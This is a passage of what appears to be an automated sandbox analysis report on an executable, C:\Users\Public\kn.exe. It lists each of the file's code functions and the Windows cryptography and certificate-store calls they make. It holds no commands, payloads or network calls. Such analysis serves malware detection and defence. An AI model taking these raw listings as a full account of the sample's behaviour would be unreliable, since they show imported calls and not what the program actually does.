              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D43C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792D43C60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5C54 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF792DF5C54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D31C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,7_2_00007FF792D31C50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF792D2FC20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D4FC34
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCBA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,7_2_00007FF792DCBA14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF792D1F9B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,7_2_00007FF792D7B9CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF792D7597C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DEB980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,7_2_00007FF792DEB980
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D27988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,7_2_00007FF792D27988
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF792DB9970
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4F944 CryptDecodeObject,GetLastError,#357,7_2_00007FF792D4F944
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7B950 I_CryptGetLruEntryData,#357,7_2_00007FF792D7B950
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D13918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D13918
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF792DBF918
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF792D9391C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D89AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF792D89AF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D53B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,7_2_00007FF792D53B14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5AA8 CryptDecodeObjectEx,7_2_00007FF792DF5AA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,7_2_00007FF792DBFA84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,7_2_00007FF792DA9A58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D97A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D97A70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D91A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF792D91A44
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D23A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D23A40
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DABA50 CryptSignCertificate,SetLastError,7_2_00007FF792DABA50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D25FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF792D25FE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF792DF5FF0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D95FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF792D95FA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D99F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF792D99F90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF792D2FF64
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D65F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF792D65F54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5F20 CryptDecodeObjectEx,7_2_00007FF792DF5F20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D260DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF792D260DA
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D64070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF792D64070
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF792DBE044
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D25DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF792D25DF7
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D01DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF792D01DE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D25DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF792D25DA1
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF792DA5D80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4DD80 CertFindExtension,CryptDecodeObject,7_2_00007FF792D4DD80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D73D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF792D73D60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D49D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D49D6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF792DF5D74
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D51D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF792D51D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCBD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF792DCBD3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF792DC7D3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DADD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF792DADD1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBFD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF792DBFD2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D85F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF792D85F04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D47F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF792D47F14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC7EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF792DC7EE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF792D4DEA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF792D7DEB0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF792DBDE70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF5E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF792DF5E3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D81E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF792D81E2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF792DC8404
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D14410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D14410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D323E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF792D323E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF792D1E3B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D82358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF792D82358
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D86374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF792D86374
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792DBE516
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D044E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D044E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF792D1C514
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D624D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF792D624D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D88488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF792D88488
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF792D6A450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF792D6C450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF792D8E1F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF792DCA1F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF6214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF792DF6214
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF792D7A1E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D321A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF792D321A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF792DB61AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF792D5417C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D76194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF792D76194
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF613C CryptDecodeObjectEx,7_2_00007FF792DF613C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D30300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF792D30300
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFA2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF792DFA2E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF792DC8298
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF792DB2278
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D66280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D66280
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792DBE274
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF792DC8814
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D907F4 BCryptDestroyKey,#205,#357,7_2_00007FF792D907F4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF792D7C7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D827BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D827BC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792DA07D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D907A4 BCryptDestroyHash,#205,#357,7_2_00007FF792D907A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF67CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792CF67CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF792D90740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DCA740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D82724 CryptDecodeObject,GetLastError,#357,7_2_00007FF792D82724
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC4914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DC4914
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF792D7E914
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D908EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF792D908EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF792D0A8CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFE8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF792DFE8B0
